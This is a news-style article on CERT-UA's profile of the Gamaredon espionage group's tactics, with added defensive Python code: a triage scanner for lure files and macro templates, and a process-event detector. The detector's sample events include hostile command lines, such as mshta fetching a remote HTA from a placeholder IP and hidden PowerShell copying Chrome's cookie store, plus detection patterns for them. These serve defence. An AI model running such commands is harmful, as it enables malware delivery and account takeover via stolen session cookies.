The Computer Emergency Response Team of Ukraine (CERT-UA) warns that the Gamaredon hacking group operates in rapid attacks, stealing data from compromised systems within an hour of initial access.
Gamaredon, also known as Armageddon, UAC-0010 and Shuckworm, is a Russian state-sponsored cyber-espionage group. Security researchers link it to the FSB (Russian Federal Security Service), and its members are reported to include former SSU (Security Service of Ukraine) officers who defected to Russia in 2014.
Since the start of the Russian invasion, the threat actors are believed to be responsible for thousands of attacks against the Ukrainian government and other critical public and private organizations in Ukraine.
The data accumulated from these attacks has allowed CERT-UA to profile the group's tradecraft, which it shares to help defenders detect and stop intrusion attempts.
Gamaredon Attack Traits
Gamaredon attacks usually start with an email or a message sent to the target via Telegram, WhatsApp, Signal or another instant messaging app.
Initial infection is achieved by tricking the victim into opening malicious attachments such as HTM, HTA and LNK files disguised as Microsoft Word or Excel documents.
Once the victim opens the malicious attachment, PowerShell scripts and malware (usually 'GammaSteel') are downloaded and executed on the victim's device.
The initial infection step also modifies Microsoft Word templates so that every document created on the infected computer carries a malicious macro, which can spread Gamaredon's malware to other systems when those documents are shared.
The PowerShell script targets browser cookies containing session data, allowing the attackers to take over online accounts even when they are protected by two-factor authentication: a valid session cookie lets them skip the login and second-factor prompt entirely.
Regarding GammaSteel's functionality, CERT-UA says it targets files with the following extensions: .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, .mdb.
If the attackers are interested in documents found on a compromised computer, they exfiltrate them within 30 to 50 minutes.
Another notable aspect of Gamaredon infections is that the threat actors plant up to 120 malicious or infected files per week on the compromised system to increase the likelihood of re-infection after cleanup.
“If during the disinfection process, after cleaning the operating system registry, deleting files, scheduled tasks, etc., at least one infected file or document remains on the computer (very often users reinstall the operating system and transfer the “necessary” documents without checking), the computer will probably be infected again,” explains CERT-UA (translated automatically).
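The re-infection problem above comes down to what gets carried over to the rebuilt machine: the HTM/HTA/LNK lures disguised as documents and the macro-laden Word templates described earlier in the article. The script below is an added example, not CERT-UA's tooling or anything from the article, showing how a responder could triage a folder of "necessary" documents before restoring it. It flags script and shortcut extensions, document-lookalike double extensions such as Report.docx.lnk, and Office documents or templates whose ZIP container holds a VBA project (vbaProject.bin). The sample tree it builds is constructed placeholder data, not real Gamaredon artifacts; Normal.dotm is simply the filename of Word's default template.

```python
from __future__ import annotations

import tempfile
import zipfile
from pathlib import Path

# Extensions the article names for Gamaredon's initial-access lures (HTM, HTA, LNK).
LURE_EXTENSIONS = {".htm", ".html", ".hta", ".lnk"}
# Document extensions those lures impersonate ("Report.docx.lnk").
DOC_LOOKALIKES = {".doc", ".docx", ".xls", ".xlsx", ".rtf", ".pdf", ".txt"}
# OOXML documents/templates that may carry VBA; a VBA project inside one is
# stored as a vbaProject.bin part in the ZIP container.
OOXML_EXTENSIONS = {".docx", ".docm", ".dotx", ".dotm", ".xlsx", ".xlsm", ".xltx", ".xltm"}
VBA_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")


def classify_file(path: Path) -> list[str]:
    """Return the reasons a file must be checked before it is restored
    (empty list means nothing suspicious was found)."""
    reasons: list[str] = []
    suffixes = [s.lower() for s in path.suffixes]
    ext = suffixes[-1] if suffixes else ""

    if ext in LURE_EXTENSIONS:
        reasons.append(f"script/shortcut lure extension '{ext}'")
        if len(suffixes) >= 2 and suffixes[-2] in DOC_LOOKALIKES:
            reasons.append(f"double extension '{suffixes[-2]}{ext}' impersonating a document")

    if ext in OOXML_EXTENSIONS and zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as archive:
            parts = set(archive.namelist())
            found = [p for p in VBA_PARTS if p in parts]
            if found:
                reasons.append(f"embedded VBA project ({', '.join(found)})")
    return reasons


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk the directory a user wants to carry over and map each suspicious
    file (relative path) to the reasons it was flagged."""
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            reasons = classify_file(path)
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_sample_tree(root: Path) -> None:
    """Constructed sample data (placeholders, not real malware): a clean .docx,
    a template with a VBA project, a double-extension LNK and an HTA lure."""
    root.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(root / "clean.docx", "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
    with zipfile.ZipFile(root / "Normal.dotm", "w") as z:  # Word's default template name
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\x00placeholder VBA container\x00")
    (root / "Report.docx.lnk").write_bytes(b"L\x00\x00\x00placeholder shortcut")
    (root / "invoice.hta").write_text("<script>/* placeholder */</script>")


def demo_scan() -> dict[str, list[str]]:
    """Build the constructed sample tree in a temp directory and scan it."""
    root = Path(tempfile.mkdtemp()) / "transfer"
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for name, why in demo_scan().items():
        print(f"{name}: {'; '.join(why)}")
```

Anything the scan flags should be opened only on an isolated analysis host; a clean `.docx` is not flagged because its container has no VBA part, whereas the template is, regardless of what its macro actually does.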
Any USB flash drive inserted into an infected computer is also automatically infected with Gamaredon's initial-compromise payloads, potentially extending the breach to isolated (air-gapped) networks.
Finally, the hackers change the IP addresses of their intermediate command-and-control servers three to six times a day, making IP-based blocking and tracing of their activity harder.
Currently, CERT-UA says the best way to limit the effectiveness of Gamaredon attacks is to block or restrict unauthorized execution of mshta.exe, wscript.exe, cscript.exe and powershell.exe, the script hosts that the group's HTA, LNK and PowerShell stages depend on.
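Where those four script hosts cannot be blocked outright, the same list can drive detection of the execution chain the article describes (a lure opened from Office or Explorer spawning a script host, a remote HTA fetch, a hidden PowerShell run that reaches into browser cookie stores). The detector below is an added example, not CERT-UA's guidance or any vendor rule: it scores process-creation events from the restricted-host list and a set of command-line heuristics that are my assumptions, and runs them over constructed sample events whose hosts, paths and the 203.0.113.10 address are placeholders.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# The four script hosts CERT-UA recommends restricting.
RESTRICTED_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Parents that open a user's attachment or shortcut; a script host under one of
# them is how the HTA/LNK lures in the article get executed.
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "outlook.exe", "explorer.exe"}

# Command-line heuristics (assumed patterns, not taken from CERT-UA).
LURE_FILE_RE = re.compile(r"\.(hta|htm|html|lnk)\b")
REMOTE_FETCH_RE = re.compile(r"https?://")
PS_EVASION_RE = re.compile(
    r"\s-(e|ec|enc|encodedcommand)\s"
    r"|\s-(w|windowstyle)\s+hidden\b"
    r"|\s-(ep|executionpolicy)\s+bypass\b"
)
BROWSER_STORE_RE = re.compile(r"\\(cookies|user data|login data)\b")


@dataclass
class ProcEvent:
    host: str
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    command_line: str


@dataclass
class Alert:
    host: str
    image: str
    parent: str
    reasons: list[str] = field(default_factory=list)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list[str]:
    """Reasons a process-creation event looks like the Gamaredon chain; only
    the four restricted script hosts are ever scored."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line.lower()
    if image not in RESTRICTED_HOSTS:
        return []
    reasons: list[str] = []
    if parent in DOCUMENT_HANDLERS:
        reasons.append(f"{image} spawned by {parent}")
    if LURE_FILE_RE.search(cmd):
        reasons.append("command line references an HTA/HTM/LNK lure file")
    if REMOTE_FETCH_RE.search(cmd):
        reasons.append("command line contains a remote URL (payload fetch)")
    if image == "powershell.exe" and PS_EVASION_RE.search(cmd):
        reasons.append("hidden window, execution-policy bypass or encoded command")
    if BROWSER_STORE_RE.search(cmd):
        reasons.append("command line touches a browser cookie/credential store")
    return reasons


def detect(events: list[ProcEvent]) -> list[Alert]:
    alerts: list[Alert] = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            alerts.append(Alert(ev.host, basename(ev.image), basename(ev.parent_image), reasons))
    return alerts


# Constructed sample events (not real telemetry); hosts, paths and IP are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\System32\mshta.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"mshta.exe http://203.0.113.10/contract.hta"),
    ProcEvent("WS01", r"C:\Windows\System32\cscript.exe", r"C:\Windows\explorer.exe",
              r"cscript.exe //E:jscript C:\Users\victim\Downloads\Report.docx.htm"),
    ProcEvent("WS02", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r"powershell.exe -w hidden -ep bypass -c Copy-Item '$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies' $env:TEMP"),
    ProcEvent("SRV01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe",
              r"powershell.exe -NonInteractive -File C:\ProgramData\Backup\nightly.ps1"),
    ProcEvent("WS01", r"C:\Windows\System32\notepad.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "notepad.exe"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.host}: {alert.parent} -> {alert.image}: {'; '.join(alert.reasons)}")
```

The scheduled backup script on SRV01 produces no alert even though it runs powershell.exe, which is the point of scoring by parent and command line rather than by image alone: an allow-listing policy such as AppLocker decides what may run, while this kind of rule catches the authorized-but-abused cases that a policy cannot express.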